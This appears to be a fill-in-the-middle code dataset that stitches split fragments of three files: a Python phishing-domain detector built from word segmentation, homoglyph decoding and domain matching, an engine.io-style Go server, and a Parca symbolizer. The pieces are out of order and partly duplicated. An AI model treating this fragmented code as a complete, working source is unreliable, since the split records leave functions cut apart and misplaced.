for domain, segments in analyser['output'].items():
# Remove wildcard domain
domain = re.sub(r'^\*\.', '', domain)
parts = domain.split('.')
x = []
# Compute the number of domain parts
x.append(len(parts))
# Compute the length of the whole domain
x.append(len(domain))
longest = ''
# Compute the length of the longest domain parts
for part in parts:
if len(part) > len(longest):
longest = part
x.append(len(longest))
# Compute the length of the TLD
x.append(len(parts[-1]))
randomness_count = 0
# The nostril package, which we are using to detect nonsense words
# in the domain, only returns a boolean verdict, so maybe we need to
# think of how we want to quantify this
for w in segments:
try:
if len(w) >= FeaturesGenerator.NOSTRIL_LENGTH_LIMIT and nonsense(w):
randomness_count += 1
except ValueError:
continue
x.append(randomness_count / len(segments))
x_samples.append(x)
Y_samples.append(True if 'usual_suspect' in record else False)
break
record['analysers'].append({
'analyser': type(self).__name__,
'output': x_samples,
})
return record
| DomainMatchingOption | identifier_name |
common_domain_analyser.py | '''
Verify the domain against the list of most popular domains from OpenDNS
(https://github.com/opendns/public-domain-lists). Let's see how useful
it is to prevent phishing domains.
'''
from enum import Enum
import re
import tldextract
import wordsegment
from nostril import nonsense
import idna
from confusable_homoglyphs import confusables
import ahocorasick
from .base import Analyser
# Take a histogram here and find out the suitable value for this
BULK_DOMAIN_THRESHOLD = 15
# pylint: disable=too-few-public-methods
class AhoCorasickDomainMatching(Analyser):
'''
The domain and its SAN will be compared against the list of domains, for
example, the most popular domains from OpenDNS.
'''
# Get this number from the histogram of the length of all top domains
MIN_MATCHING_LENGTH = 3
# Some domains that don't work too well with tldextract and generate too
# many FPs
EXCLUDED_DOMAINS = {
'www': 1,
'web': 1,
}
# Some common domain parts that cause too many FP
IGNORED_PARTS = r'^(autodiscover\.|cpanel\.)'
def __init__(self, domains):
'''
Use Aho-Corasick to find the matching domain so we construct its Trie
here. Thought: How the f**k is com.com in the list?
'''
self.automaton = ahocorasick.Automaton()
self.domains = {}
for index, domain in enumerate(domains):
# Processing only the domain part. All sub-domains or TLDs will
# be ignored, for example:
# - www.google.com becomes google
# - www.google.co.uk becomes google
# - del.icio.us becomes icio
ext = tldextract.extract(domain)
if ext.domain in AhoCorasickDomainMatching.EXCLUDED_DOMAINS:
continue
self.automaton.add_word(ext.domain, (index, ext.domain))
self.domains[ext.domain] = domain
self.automaton.make_automaton()
def run(self, record):
'''
Use Aho-Corasick to find the matching domain. Check the time complexity
of this function later.
Tricky situation #1: When the string (domain) in the Trie is too short,
it could match many domains, for example, g.co or t.co. So they need
to be ignored somehow. Looking at the histogram of the length of all
domains in the list, there are fewer than 100 domains with a
length of 2 or less. So we choose to ignore those. Also, we will
prefer a longer match over a shorter one for now.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segmentation to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off because it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let's see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class DomainMatchingOption(Enum):
'''
Control how strict we want to do our matching.
'''
# For example, applefake.it will match with apple.com because ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk records and deal with them later; with such a large
# number of SAN names, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Used internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advanced analysers to have their say on that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = len(record['all_domains']) >= self.threshold
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove the wildcard because it interferes with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Failed to decode the domain; just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be done right after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using confusable-homoglyphs, we are going to generate all alternative ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we only care about Latin characters
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decide to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is Latin, so we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the length of the homoglyph here because the
# confusable_homoglyphs library nicely returns multi-character
# matches as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
| if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
class FeaturesGenerator(Analyser):
'''
Generate features to detect outliers in the stream. In our case, the outliers are
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = []
Y_samples = []
for analyser in record['analysers']:
if analyser['analyser'] != 'WordSegmentation':
continue
for domain, segments in analyser['output'].items():
# Remove wildcard domain
domain = re.sub(r'^\*\.', '', domain)
parts = domain.split('.')
x = []
# Compute the number of domain parts
x.append(len(parts))
# Compute the length of the whole domain
x.append(len(domain))
longest = ''
# Compute the length of the longest domain parts
for part in parts:
if len(part) > len(longest):
longest = part
x.append(len(longest))
# Compute the length of the TLD
x.append(len(parts[-1]))
randomness_count = 0
# The nostril package, which we are using to detect nonsense words
# in the domain, only returns a boolean verdict, so maybe we need to
# think of how we want to quantify this
for w in segments:
try:
if len(w) >= FeaturesGenerator.NOSTRIL_LENGTH_LIMIT and nonsense(w):
randomness_count += 1
except ValueError:
continue
x.append(randomness_count / len(segments))
x_samples.append(x)
Y_samples.append(True if 'usual_suspect' in record else False)
break
record['analysers'].append({
'analyser': type(self).__name__,
'output': x_samples,
})
return record | def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
''' | random_line_split |
server.go | // Copyright (c) 2014, Markover Inc.
// Use of this source code is governed by the MIT
// license that can be found in the LICENSE file.
// Source code and contact info at http://github.com/poptip/ftc
package ftc
import (
"encoding/json"
"expvar"
"fmt"
"io"
"net/http"
"strings"
"time"
"code.google.com/p/go.net/websocket"
"github.com/golang/glog"
)
var numClients = expvar.NewInt("num_clients")
const (
// Protocol error codes and mappings.
errorTransportUnknown = 0
errorUnknownSID = 1
errorBadHandshakeMethod = 2
errorBadRequest = 3
// Query parameters used in client requests.
paramTransport = "transport"
paramSessionID = "sid"
// Available transports.
transportWebSocket = "websocket"
transportPolling = "polling"
// The default time before closed connections are cleaned from
// the client pool.
clientReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
	if c != nil {
		c.Close()
	}
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
			// TODO(andybons): Requests can pile up here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
	if err := newPayloadEncoder(w).encode(payload); err != nil {
		glog.Errorf("could not encode open payload: %v", err)
		return
	}
	if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
remoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// handshakeData returns the JSON encoded data needed
// for the initial connection handshake.
func handshakeData(c *conn) ([]byte, error) {
return json.Marshal(map[string]interface{}{
"pingInterval": 25000,
"pingTimeout": 60000,
"upgrades": getValidUpgrades(),
"sid": c.id,
})
}
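// For illustration (not part of the original source): for a conn whose id is
// "abc123", the map above marshals with its keys sorted, so the open packet's
// data looks roughly like:
//
//	{"pingInterval":25000,"pingTimeout":60000,"sid":"abc123","upgrades":["websocket"]}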
// serverError sends a JSON-encoded message to the given io.Writer
// with the given error code.
func serverError(w io.Writer, code int) {
if rw, ok := w.(http.ResponseWriter); ok {
rw.Header().Set("Content-Type", "application/json")
rw.WriteHeader(http.StatusBadRequest)
}
msg := struct {
Code int `json:"code"`
Message string `json:"message"`
}{
Code: code,
Message: errorMessage[code],
}
if err := json.NewEncoder(w).Encode(msg); err != nil {
		glog.Errorf("error encoding error msg %+v: %s", msg, err)
return
}
glog.Errorf("wrote server error: %+v", msg)
}
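// For illustration (not part of the original source): serverError(w, errorUnknownSID)
// responds with HTTP 400 (when w is an http.ResponseWriter) and a body of:
//
//	{"code":1,"message":"Session ID unknown"}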
// setPollingHeaders sets the appropriate headers when responding
// to an XHR polling request.
func setPollingHeaders(w http.ResponseWriter, r *http.Request) {
origin := r.Header.Get("Origin")
if len(origin) > 0 {
w.Header().Set("Access-Control-Allow-Credentials", "true")
} else {
origin = "*"
}
w.Header().Set("Access-Control-Allow-Origin", origin)
w.Header().Set("Connection", "keep-alive")
w.Header().Set("Content-Type", "text/plain; charset=UTF-8")
}
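// Illustrative sketch, not part of the original source: one way this package
// might be wired into a standalone binary. The import path github.com/poptip/ftc
// is taken from the header above; everything else here (port, handler body) is
// an assumption for illustration only.
package main

import (
	"net/http"

	"github.com/golang/glog"
	"github.com/poptip/ftc"
)

func main() {
	// Passing nil options falls back to the "/engine.io/" base path and the "io" cookie.
	srv := ftc.NewServer(nil, func(c *ftc.Conn) {
		// Per-connection application logic would go here.
	})
	// The server implements http.Handler via ServeHTTP, so it mounts directly.
	http.Handle("/engine.io/", srv)
	if err := http.ListenAndServe(":8080", nil); err != nil {
		glog.Fatal(err)
	}
}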
symbolizer.go | // Copyright 2022-2023 The Parca Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package symbolizer
import (
"context"
"debug/elf"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"time"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
debuginfopb "github.com/parca-dev/parca/gen/proto/go/parca/debuginfo/v1alpha1"
pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
"github.com/parca-dev/parca/pkg/debuginfo"
"github.com/parca-dev/parca/pkg/profile"
"github.com/parca-dev/parca/pkg/runutil"
"github.com/parca-dev/parca/pkg/symbol/addr2line"
"github.com/parca-dev/parca/pkg/symbol/demangle"
"github.com/parca-dev/parca/pkg/symbol/elfutils"
)
var (
ErrNotValidElf = errors.New("not a valid ELF file")
ErrNoDebuginfo = errors.New("no debug info found")
ErrLinerFailed = errors.New("liner creation failed")
)
type DebuginfoMetadata interface {
SetQuality(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType, quality *debuginfopb.DebuginfoQuality) error
Fetch(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType) (*debuginfopb.Debuginfo, error)
}
// liner is the interface implemented by symbolizers
// which read an object file (symbol table or debug information) and return
// source code lines by a given memory address.
type liner interface {
PCToLines(pc uint64) ([]profile.LocationLine, error)
PCRange() ([2]uint64, error)
Close() error
File() string
}
type Option func(*Symbolizer)
func WithAttemptThreshold(t int) Option {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
}
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
	// FetchDebuginfo ensures that the debug info for the given build ID is
	// available and returns a reader for its contents.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
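// For illustration (not part of the original source): mappings whose file is
// "[vdso]", "[vsyscall]", "linux-vdso.so.1", or anything under /dev/dri/ are
// reported as unsymbolizable here, while a regular binary such as
// "/usr/bin/bash" is not.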
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
